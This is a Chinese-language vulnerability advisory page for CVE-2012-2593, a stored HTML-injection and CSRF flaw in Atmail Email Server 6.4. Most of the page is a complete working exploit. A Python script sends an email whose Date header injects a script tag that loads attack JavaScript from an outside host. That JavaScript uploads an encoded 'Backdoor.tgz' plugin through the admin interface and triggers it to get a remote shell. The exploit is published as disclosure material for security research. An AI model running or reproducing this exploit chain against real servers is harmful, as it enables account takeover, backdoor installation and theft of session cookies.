发布日期:2012-07-21
更新日期:2012-07-25受影响系统:
@Mail Atmail Email Server 6.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54630
CVE ID: CVE-2012-2593Atmail是商业化Linux消息传送平台提供者。Atmail Email Server 6.4在实现上存在HTML注入和跨站请求伪造漏洞,成功利用后可允许攻击者提供的HTML和脚本代码在受影响浏览器中运行,执行非法操作,窃取Cookie验证凭证或控制站点外观。<*来源:Muts (muts@whitehat.co.il)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Muts (muts@whitehat.co.il)提供了如下测试方法:#!/usr/bin/python
import smtplib, urllib2, sysdef sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: admin@offsec.local
"
msg += "To: admin@offsec.local
"
msg += "Date: <script src="http://172.16.164.1/~awae/atmail-rce.js"></script>
"
msg += "Subject: You haz been pwnd
"
msg += "Content-type: text/html
"
msg += "Oh noez, you been had."
msg += "
"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()username = "admin@offsec.local"
password = "123456"
dstemail = "admin@offsec.local"
frmemail = "admin@offsec.local"
smtpsrv = "172.16.164.147"if not (dstemail and frmemail and smtpsrv):
sys.exit()sendMail(dstemail, frmemail, smtpsrv, username, password) function timeMsg()
{
var t=setTimeout("getShell()",5000);
}function getShell()
{
var b64url ="http://172.16.164.130/index.php/admin/plugins/add/file/QmFja2Rvb3IudGd6";
xhr = new XMLHttpRequest();
xhr.open("GET", b64url, true);
xhr.send(null);}
function fileUpload(url, fileData, fileName, nameVar, ctype) { var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "
";
body += "Content-Disposition: form-data; name="" + nameVar +""; filename="" + fileName + ""
";
body += "Content-Type: " + ctype + "
";
body += fileData + "
";
body += "--" + boundary + "--"; //xhr.send(body);
xhr.sendAsBinary(body);
return true;
}var nameVar = "newPlugin";
var fileName = "Backdoor.tgz";
var url = "http://172.16.164.130/index.php/admin/plugins/preinstall";
var ctype = "application/x-gzip";
//var ctype = "application/octet-stream";
//var data = "x44x41x42x43x44";
var data = "x1Fx8Bx08x00x44x7Ax91x4Fx00x03xEDx59xEDx72xDBxC6" +
"x15x55x3BxD3xE9x88xFFxDBxDFx1Bx8DxA6x22x27x24x48" +
"xF0xD3x96x2Ax27x34x2DxD9x9CxC8x92x86x94xE2x7Ax9A" +
"x0Ex67x05x2Cx49x8Cx40x00xC6x02xA2x99xD4xEFxD1xD7" +
"xE8x33xF5x45x7AxEEx2Ex40x91x16x4Dx53x89x46x69x63" +
"xDCx89x4Cx12xB8x7BxF7xE2xDCxAFxB3x88x51x36x06x67" +
"xC3xA1xF0xA4x73x23xFAxC2x8Ax43x27x9Ax6Dx3DxACx54" +
"x2Ax95x56xA3xC1xD4x67x53x7Fx56xAAx75xFDx49x52xAB" +
"xD7x98x69xB6xEAxF5x6AxABx61x56x4Cx56x31x1Bx66xB3" +
"xB5xC5x2Ax0FxECxC7x4Ax89x65xC4x43xB8x32x89x23xB9" +
"x4Ex0Fx6AxC3xE1x9AxFBxFAx51xD8xFCxF3xFFx45xFExF0" +
"xE7x3Fx6ExFDx7Ex6BxEBx35xB7xD8x59x9FxFDx8Dx25x42" +
"xD7xB6xB6xF1x57xC5xDFxBFxF1x47xBFxFFxB3x99xC9xF6" +
"xC5x45x2FxF9x4Ax2BxFEx85xBFxEFx3Ex52xF9xDDxEDxF5" +
"x3Fx59xFExC4xE0x41xE0x0AxE3x5DxCCx43xEEx45x8Ex27" +
"xB6xDEx95x81xA2x79x50x1Fx3Ex35x1Bx95xE6xD3x83xFE" +
"xF5x2Cx10x07xB5x17x4Fx6Bx4FxDBx95x4ExA9xF2xE2x69" +
"xA7x54x6Fx77x9Ex97x9Ex3Cx7DxF2xBCx74xD4x79x7Ex7C" +
"xDCx32x6Bx95xBAx79xF4x4FxB2x27x49x5DxFFxFBx00x18" +
"xFDx86xE5x4ExEDx97x1Fx7Ex8FxCFxD5x3FxD5xCBx72xFD" +
"xD7x9Bx54xFFx8Dx87x77xE5xAEx7CxE1xF5x7Fx37xFExC6" +
"xE0x39xB7xAEx6DxDFx0Fx1Fx6Ax8Fx7BxF4xFFx7AxB3x45" +
"xF1x6Fx36x5Ax66xD6xFFx1Fx45xB2xFExFFx45xCBxDDxFA" +
"x4FxABxFFxE1x06xC1x3DxFAx7Fx5AxFFxF5x6Ax33xEBxFF" +
"x8Fx21x6BxE2x6Fx0Cx1CxCFx72x63x5BxACxC5x65x03xB9" +
"x4FxFFx6Fx55x6AxACx52xADxD4x5AxB5xACxFFx3Fx8Ax64" +
"xFDxFFx8Bx96x35xF5x9Fx56xFFx2Fx1Ex04xF7xE9xFFx49" +
"xFDx57x6Bx95xACxFFx3Fx86xACxEDxFFxE7x6Ex3Cx72x3C" +
"x23x18x07xBFx68x0FxE0xD1xACxD7x37x7BxFFx53x69xA8" +
"xF8x37x2Bx8DxACxFFx3Fx8Ax64xFDxFFx8Bx96x35xF5xFF" +
"x40xD5xFFxD9xFAx37x1BxD5xD6xC7xF5x5Fx6Bx65xF5xFF" +
"x28xF2xD7x6Fx10xDFx9CxE5x72x29xD9x9Dx5Cx98xBFx09" +
"x4Ax26x01x13xEFx23xE1xD9x92xB5xA3x09x77xDCx41xC7" +
"xF7xA2xD0x77x5Dx91x2AxE4x7ExCAx6Dx07xA1x1Fx09x2B" +
"x12x36xDBx1Dx04xEAxEAx71xECxBAxA7x7Cx22xB6xB7x0F" +
"xD9x5Ex6Ax72xEFx60x95x6AxC7x9Fx04xDCx9Bx29xCDx3B" +
"xEExACx5ExD2x8ExA3xB1x1Fx2ExAFx60xE9x12xE6x78x43" +
"xFFx5Bx3FxBDx5Ex92xC9x75x03x4DxE2x53x1Ex04xB3xD0" +
"x19x8Dx23x65x91xB2x82x96x63xDDxA7x97x5Cx86xEExB6" +
"xD2x9Ex4ExA7xC6x7DxF6x3AxC5x05xA9x97xAEx56xF8x5E" +
"x84xD2xF1x3DxA5x51x31x2Ax86xB9x5AxEDxB5x6FxC7xAE" +
"x86x97xE2xB2x06x5AxFDx54x4DxC3x34x9Ax8CxFEx6Dx91" +
"x2ExB4xE3x2BxD7xB1xD8x30xF6xACx08xFBxB1xC1xC0xF2" +
"x3Dx19x85xB1x15xE5x0BxB9x6Dx44x75x3BxE0xA1xF0xA2" +
"xFDxFDxA5x5Bx58xBCxBDx1Bx8Dx1Dx59x7Ax96xECxF2x42" +
"x48x2Bx74x02x65xE5x90xEDxBCxE2xA1x6DxF9x36xDCx40" +
"x9Ax95x26xBEx77x2Dx66x2Cx14x37x78x2ExC1xE4x58xB8" +
"x2Ex22x24x1Dx5Bx7CxB5x03x5Bx1Fx56xF9x22x45x14x07" +
"xA9x17x6AxC9x40xBCx17x56x7Ex0Fx16x59x39x96x61xD9" +
"xF5x2DxEEx96xB9xCAxC9xF2x54x5CxA9x4Fx9Ax28x8ExC5" +
"xC9x44x79xA2xF0x91x65x75x43xFBx29xCBx9Bx30x5Fx72" +
"x3AxF1xB6xA4xB6xA6x6ExC8x9ExB1xB2x2Dx6ExCAx1ExD2" +
"x9Ax55x9FxDDx7ExFFxCBx1Ex01xF2x61x3BxF7x21xF7x6B" +
"x97xF5xC6xB2x09x0AxC6x60x25x0Ex1BxEFxB1x39xFFxAB" +
"xB7xEAxB5x26xFAx7FxBDx41xEFx7FxB2xFExFFx08x92xF1" +
"xBFx2Fx5Ax7Ex76x17xBCxC7x1ExEBxEBxDFxACx36x9AxAD" +
"x8FxEBxBFx56xADx67xF5xFFx18xA2xF9x5FxB9xCCxEEx04" +
"x99x95x58x9BxF5x92x51xDDxD7xA3x7Ax82x2Ax9Dx80x06" +
"xA8xB1x8AxC9xCDxCEx5Fx9DxD3xE2x39x69x62xF9x4Ex81" +
"x55x11x67x16x40x4DxC8x48x8FxFCx6Fx97x7Ex19x9Ex88" +
"xB0x8Ax16x5Ex80x3BxB0xC8xF7x5Dx36xE1x33x76x25x58" +
"x2CxC1x15x86x7ExC8x5Cx31xE2x2Ex0BxE2x30xF0xA5x90" +
"xCCxF7xDCx99xC1xD8xA5x84x3Bx2CxE2xD7x02x04x01x1E" +
"x85x42x06xA0x23xCEx95xE3x22x77xC9x22xADx05x83x64" +
"x5CxB1x07x09x3Fx42x5Cx9AxC0x6Ax2Cx1Dx6FxC4xA2x74" +
"x47x58xBBx18x0BxC6x15x7Dx84xBAx25x82x48x32xCFx67" +
"xAExC3x97xCDxD9x7CxC2x47x82x59x5Cx39x77x35x5BxB2" +
"xD1x1DxE2xA7x00x44x91x08x27x92x81x25xC1x46x94xD8" +
"xE3x57x2Ex6ExF8x6CxE6xC7x45x52xF3xC8xA4xEDx2Bx8D" +
"x98xD6xCCx0Dx25x78x74x3DxC6xF1x58x3Ex74x43xF5x70" +
"xE0x70x92x56xB2x97xE7x27xECx46xD3x41x56x65x8AxDD" +
"x08xB9xBFx08x23x28xDFx28xE4x13x86xAFxC3x50x80x5E" +
"xF9xC3x68x0Ax7Fx0Ex68x7Bx78xEFxC1xA0xEDx80xBAx39" +
"x57x71x24x98x03x27x3DxBBx8CxE7x03x3Dx72x86xEAx69" +
"x71x2DxF6x6Cx6Cx4Dx3BxEAx07xF2x87x7AxFBxD3x4BxF6" +
"x52x78x22x44x50xCEx35x43x3Bx71x2CxB4x0ExB1xE8x95" +
"x54x99x44xB7x91x42x09x54x82x1Dx93x37xFDxC4x1Bx76" +
"xECx63x0Bx95x40xC6x27xBCxBFx75xD2xA6x1Cx23x13x63" +
"x3Fx20xB4x78x44x2Ex4Ex1Dx40xA4x73x05x49x50x24x13" +
"x50x66x6FxBAx17xAFxCEx2Ex2Fx58xFBxF4x2Dx7BxD3xEE" +
"xF5xDAxA7x17x6Fx0FxA0x8CxF8xE2x2Ex12x59x9BxA2x24" +
"x76x60x19xCExD0xB0x99xE1x09xC9xC2xEBxA3x5ExE7x15" +
"x96xB4x9Fx77x4FxBAx17x6Fx19x70x39xEEx5Ex9Cx1ExF5" +
"xFBxECxF8xACx87x52x38x6FxF7x2ExBAx9DxCBx93x76x8F" +
"x9Dx5FxF6xCExCFxFAx47x88x7Ex5Fx90x5Bx82x0CxACx41" +
"x68xA8x40xC6xB3xDBx22x02x05x95xE9x83xBFx45x5Cx24" +
"xBCx73x6Dx36xE6x38xB5x84xC2x12x68xC5x36xE3xCCx42" +
"x45x6Dx80x3Dx77x7Dx6Fx44xA6xE8x31x75x3Ax25x40x1E" +
"x30x67x48x79x56x64x53xB4x75x95x85xEBx62x51x44xEA" +
"x59x86xC2xB2x61x42x8Bx7BxD7x2ExB0xEFx47xD0x87x8D" +
"x63x67x08xFBxC7x2ExE6x42x91x3DxF7x65x44x2Bx5ExB7" +
"xD1xAAx4DxB3x52xC2xE0x35xD9x65xBFx6DxFCx4Fx54xF5" +
"x26x15x49x36xE7x45xB9xB6x22x29x46x64x42x78x96x1F" +
"x87xE8x03x36x41x29x71x0Cx46x8Cx26xD4x0Cx65x91x72" +
"x2AxF4x6Fx54x6Bx94x94x39x32x1Ex8DxD0xEEx94xABx7A" +
"xB3x09x62x15x6DxD8x14x17xCEx50xF4xB3x74x2Bx73x70" +
"xB5x82xAEx84x09xE1x86xEAx46x96x5Fx51x3CxD9x45xE7" +
"x1CxBEx79x9ExD0x07x28xB8xCBx91x5FxE9x41xACx7Bx4E" +
"x75xCFx02x3Fx8Cx0Cx6Dx4Fx25x9Ex13x38x70x67x5Ex5B" +
"x23x87xEAx85x27x67xB4x30xF6x3Cx82x99xEBx5Ex04xA6" +
"x40x87x41x02x2Cx64x79x1Ex70x6Bx4Cx18x87x13xF4xAE" +
"x59x21x45xEExC4x99x38x7Ax52xC8x15x8Fx01xC0xACx01" +
"xAAxDAx53xDExA0xE0x05x9Fx0Cx70xD6x1Bx5CxE1x38x77" +
"x4Dx9Bx85xE2x5DxECx00x79xCCx98x79x8FxA9x1BxB5xAF" +
"x8Bx84x70xE3x6Bx32x82xC4xA1x22x99xAFx76x05x9Dx4A" +
"x91x56x6CxE8xB8x54x6Ex1Ax27x1FxD9x15xE2x18x19x7A" +
"xBAx29xCDxF7x86xAEx7AxE0x21xAAx52xF9xA1xB5xD8x71" +
"xFBxA4x7Fx94xB4xC2x37x8Ex67xFBx53x55xB3x28x1CxC4" +
"x11x61x0Fx60xBDx14x39xF8xE1x07x3AxCAx2AxCBx84xB0" +
"x93x3CxB7xB9x40x58x1DxA9x07x65xDEx75x10xA2xC0xF2" +
"x22xB7x08xE0xA5xF3xBExA0xA7x0Fx55x30x16x86xF8xC7" +
"x45x72xDFxC0x0Dx4AxD0x14xC1x4Bx89x7Cx9Bx63xA7x1C" +
"x40xF5x8ExA3x28xD8x2Fx97xEFx64x4Fx99xD2x76x05x5B" +
"xA3x46x40x13x60x24x22x20x15x5BxD7x46x2Ex47x40x93" +
"xFFx03x97x82xC4xF2x15x9Cx5Cx77xBFx3FxEAxF5xBBx67" +
"xA7x74x6Ex37x8Dx0Ax0ExE4xBBx4Ex80x1Fx7Bx66xABx6A" +
"x98x4DxE3xC9x13xC3xACxD5xF7x0Ex18xA3x89x8Fx5ExF9" +
"xF2x88x5DxBCxEAxF6x73xBBx94x4Bx50x34xABxB5xFAx41" +
"x72x7ExF8x58xC5x1AxC7xDExF5x40x3Ax3Fx0Ax52xACx57" +
"x2AxB0xAEx1AxD3x80xE3x02x1Dx9Fx71x41x84xA1x1Fx2E" +
"x5ExD0xFExC3x85xD8xE3x00xBBxC4xD1xCFxD1xD8xECx03" +
"x56xBEx72xBCxB2x1CxB3x92xB3x07x3Dx0Dx37x14xC9xAC" +
"x2DxAExE2x91xFEx9Ex16x54x12x0Dx84x2Bx06x2CxEEx90" +
"x20x41x1CxD0x61xF4x7CxE6x37xBEx63xB3x1FxFDxC9x15" +
"x86x2Ax73x39x3Ax07x2Dx55x79x4Ax51x1Bx20xA6xD7x34" +
"x9AxA8x8Cx10x29x82xF7x36x5Cx45x35x7Ex54x22xA1x00" +
"xFCx29xEAx82x8CxA6x39xA0x22x88x8Dx89x62xA9xD4x13" +
"x52xAAx64x5BxDAx15x09xF1x06x30x8Ex51x73x51x38x33" +
"x0Cx23x07x1FxF3xE9x5Bx90x81x78x8FxA1x28xF3x7BxB7" +
"xEExECx15x0AxECxA7xDCx36x6Cx1Fx93x73x64x50x0Dx11" +
"x2Ax50xFDxB2x66xBEx19x16x47xB9xEDxDDx00xBBx1Dx2E" +
"x3Cx90x7Ax7Fx93xDBxA6x7DxF4xBDx43x56x32x95xD1xED" +
"x20x74x70x0Ex8BxF2x3Bx47xBDxDEx59x6Fx9Fx75xB8xB7" +
"x17x51x66x5FxEFxA8x97x3Ex64x31x6Fx16xD2x77x36xA9" +
"x09xBDx58xDDx44x46xA9x2Cx38xD7xAExD0x35x49xDAxCA" +
"xE3xD7xD4xB2x16x3BxC9x1Cx16x74x56xA9x2AxDDx15x1C" +
"xD5xA7xB4xDFx10xB2x34x2AxD0x57xD1xC4x89x15x0CxD9" +
"x54x8DxD5x6Bx61xEBxDDx55x55x51xFFx90x8Ex8DxAAx5E" +
"xF9x28x94x5DxE9xA3xA4x9Ax77x1Fx07x40xCDxD3xC9x3C" +
"xC8x7Dx60xC2x45xE2xA8x17x9Bx89x21x90x8BxD3xEExE9" +
"xCBx7Dx76x8Cx04xD0xF3x60x1Ex6Bx55xD7x48x14xFCx87" +
"xEEx15xA9x6Ex41xB6x28x3Cx34x63x86x3CxE2xAEx41xBB" +
"x7Ex50xE9xD5x19x73x6FxA4x73x90x49x3Ex44xCFx42xCB" +
"xB3xD0xB1x66x39x6Bx8CxEFxF9x9Dx32x29x93x6Ax0Fx5B" +
"xDCx08x35x06xE3x09x97xD7x04x81xE3x81x28x62x1Bx3B" +
"xA7x2ExA9x3Ax4Ex93x5Ex0FxFCxA5x97x6Dx94x56x49x5E" +
"x9Fx51xEBx4Dx6FxDEx4Ex0BxD4x1CxDAx2Fx1Ex7Dx48x9F" +
"xAAx47xA2x0Bx14x99xAAx71x7CxA0x44x3Dx5Fx7FxA2xEB" +
"x16x59x8Dx76xA4x00x7CxA5x16x16x96x80x4AxB4x90x1B" +
"x6Ax99x06x7Bx8ExB5x06xA0x1FxF0xA9x97x8Cx99x24x0B" +
"xA8x84xE7x8Dx1Bx0Cx18xDEx10x57x9BxE5x73x68x2Cx15" +
"x76xF8x2CxF9xB9x13x38x81xD8x29xB2x9Dx70xA7x50x54" +
"xC9x26x23x1BxA4xC5xA1x3CxA2x7Bx9Ax31xAAx3Cx1Bx3B" +
"x20x59xAAx44x31x2AxD0xA3x43x7Fx42xD6xCCx15xD6xA6" +
"x0BxD6x88x39xAEx37x97xB2x2BxB2x56x5Dx6Dx8DxA5xD6" +
"x80xC2xA6xD6x28x8ExBBx69x55x1Cx2Ex4Cx2CxDDx13x11" +
"x81x65x8Cx28x42x30x2Ax69x9Dx0Ax87x23x07xA0x51x68" +
"x3Bx96xC8xA7x86x0AxCBxE1x59xAAx6Dx79x1Bx87x95x61" +
"x12x8Ax42x87x33x10x24xE2x5BxC4x98xBCx52x3AxABx75" +
"x7Ax72xE9x7BxFBxECxCCxB2xA8x80x89x0Ax28xACx65xC2" +
"x29x48xB5x98xD2x70x3Fx1Ex8Dx97xC7x36xD8x9AxEBx4A" +
"xD5x3AxC7x62xC6xA6x3Ex9CxCAxADxA0x05x79xFDx9Cx7F" +
"xAFxFCxA3xC8x28xF7xD6xA8x98x9Fx57xA9xAEx53x91xCA" +
"x63x55x52x73xCCxFAxD4x81xA4x24x9Ax0Ax7Ex8Ex80x08" +
"xFBxA3xF7xD9x80x06x15xB3xAFx0Ax46x95xEEx74x4Cx5C" +
"x24x6FxA6xEDxBAx33x16xA8x30x62x09x44x22x41x5Fx96" +
"xF9x9AxEEx67x43xE1x0FxB5x07x85xD5x1Dx59x9FxC8x17" +
"x69x1ExD8xAExE3x61x74xD9xBAxA7x5DxE1x89xAEx0FxE6" +
"x2DxF7xCExAExFDx8Bx17x38x2Dx2DxEEx96xA2xB6x76xC7" +
"x34x27x3FxB3xDDx1BxAExCEx92x11xF1x2AxD5x03xA9x01" +
"x22xF7x69x73xD0x29x8Fx25xE8x12x59x06xA9x52x6Bx52" +
"x35x14x5Dx90xD4x5Dx3Ax62x89xD2x69x87x69x05xBExC1" +
"x27x34x6AxCAx2FxC5x17x74xD1x25x36x17xC2x3Fx0Fx33" +
"xF9xB8xEBxC5x93x81xA5x1AxAEx3Dx20x55xCCx00xACx5D" +
"x66x8Fx89x4Dx2Cx4DxE8x89x6Ex76xC4x4Bx8Ax8Ax96x50" +
"x48xC9xDBxAEx9Ax41xFAx58x9Dx74x14x55xCDx14x4Dx6D" +
"xBCxA8x8Ex09x4Ax19x87x2Cx4Ex99x91xA0xB7x27xE9x19" +
"xBAxA7x1Ax7DxC7x1Bx2CxFBxAFx5Dx48xC2xA0x66xABxE2" +
"x34x05x76x9Bx86x67x9DxEFx58xEFxA8xFDx42x83xBFxEB" +
"x78x84xD8x21x1DxFCxB9x3DxB7x73x4BxBAx94xD6x27x2D" +
"xEDx33x6Dx40x1Bx1BxAAx07x5FxACx33x7DxB7x70x1BxDD" +
"x4Fx3DxFBxD2xE3xA9xECxA2xC6xA7x62x4Ex00xA8xC0x47" +
"x56x70x27xDBx6Fx11x58x08xDDx06x28xE8x8CxF8x34x0E" +
"x0BxD6x36xC2x42xD9x5Bx8Dx46x02xE9xCFx42x42x25xEB" +
"xCFx43xA2xBAx31x12xD8xE4xB3x48x54xEFx81x04xECx6D" +
"x8Ax04xB0x18x5Ax2Ex4ExF4x49xC7x3Ax98xFFx4Cx73xE8" +
"xCEx25xF3xEEx25x55xA4x6AxD0xA5x97x93xA9xA5xE9xCF" +
"x89x3Ax43x91x83x9Ax6FxDBxBExA0xD7x75x7Ax1Ex29x42" +
"xB8x07x76x34x27x62x76xCAxF5x69x6DxBEx4Bx21x22x06" +
"xEBx8CxE2x90x8Ex01x11x1Bx83xA8xA3x22xE9x9Dx18x31" +
"xAExB4xBDxA8xA3x1AxA7xF8x05x22x3DxC7x15x72xF3xFF" +
"x1Bx99x20x04xC8xE8x1Dx95x37x52x31xD1xFCx27xD1xBD" +
"xEDx9Dx6Cx27x51xFAxC1xDBx49x71xFAxE6x19xCBx41x7E" +
"xEDxD7xBEx99x64x92x49x26x99x64x92x49x26x99x64x92" +
"x49x26x99x64x92x49x26x99x64x92x49x26x99x64x92xC9" +
"x6Fx58xFEx0Bx3ExE1xD0x84x00x50x00x00";// UPLOAD THE THINGIE...
fileUpload(url,data,fileName,nameVar,ctype);
timeMsg();建议:
--------------------------------------------------------------------------------
厂商补丁:@Mail
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.securityfocus.com/bid/51313/www.atmail.comlibpng越界读取拒绝服务漏洞eCryptfs本地权限提升漏洞相关资讯 Atmail 跨站请求伪造漏洞
- Atmail Webmail Server不明细节安 (01/14/2014 19:23:26)
- IBM Tivoli Endpoint Manager 跨站 (03/26/2013 18:48:05)
- Apache Roller跨站请求伪造漏洞 (06/28/2012 05:32:58)
| - Atmail WebMail跨站脚本漏洞(CVE- (03/29/2013 14:08:35)
- JBoss Enterprise Application (08/10/2012 07:19:43)
- Juniper IVE OS Network Connect/ (04/08/2012 07:46:05)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论<
|
易网时代-编程资源站